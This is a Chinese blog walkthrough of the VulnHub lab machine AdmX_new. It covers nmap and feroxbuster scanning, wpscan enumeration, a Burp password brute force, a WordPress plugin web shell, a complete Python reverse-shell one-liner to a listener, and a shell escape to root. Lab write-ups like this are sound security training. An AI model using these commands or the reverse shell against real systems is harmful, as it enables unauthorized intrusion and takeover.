AdmX_new靶场

一、靶场介绍

1.下载地址:https://download.vulnhub.com/admx/AdmX_new.7z
2.将靶机网络适配器改为NAT模式
3.启动靶机

二、信息收集

1.主机发现

nmap -sn 192.168.111.1/24

在这里插入图片描述
2.端口扫描

nmap -A 192.168.111.136 -p 1-65535

在这里插入图片描述
3.目录扫描

feroxbuster --url http://192.168.111.136

这里图片忘记截了
在这里插入图片描述
4.网页访问
在这里插入图片描述

三、渗透流程

1.页面访问慢,查看请求都指向了192.168.159.145
在这里插入图片描述
2.利用BP,将地址进行替换,再重新访问
在这里插入图片描述
在这里插入图片描述
3.利用wpscan爆出用户名admin

wpscan --url http://10.0.2.7/wordpress --enumerate

在这里插入图片描述
4.利用BP爆破admin密码
在这里插入图片描述
在这里插入图片描述
5.在/wordpress/wp-admin使用admin/adam14进行登录
在这里插入图片描述
6.上传.zip木马文件
在这里插入图片描述
网页尝试访问

http://192.168.111.136/wordpress/wp-content/plugins/1.php?cmd=id

在这里插入图片描述
7.kali开启监听,网页执行shell

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.111.129",7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn(["/bin/bash"])'

在这里插入图片描述
在这里插入图片描述
反弹成功
在这里插入图片描述
8.查看当前用户权限
在这里插入图片描述
9.尝试访问权限目录
在这里插入图片描述
10.获取root权限,提权成功

\! /bin/bash

在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值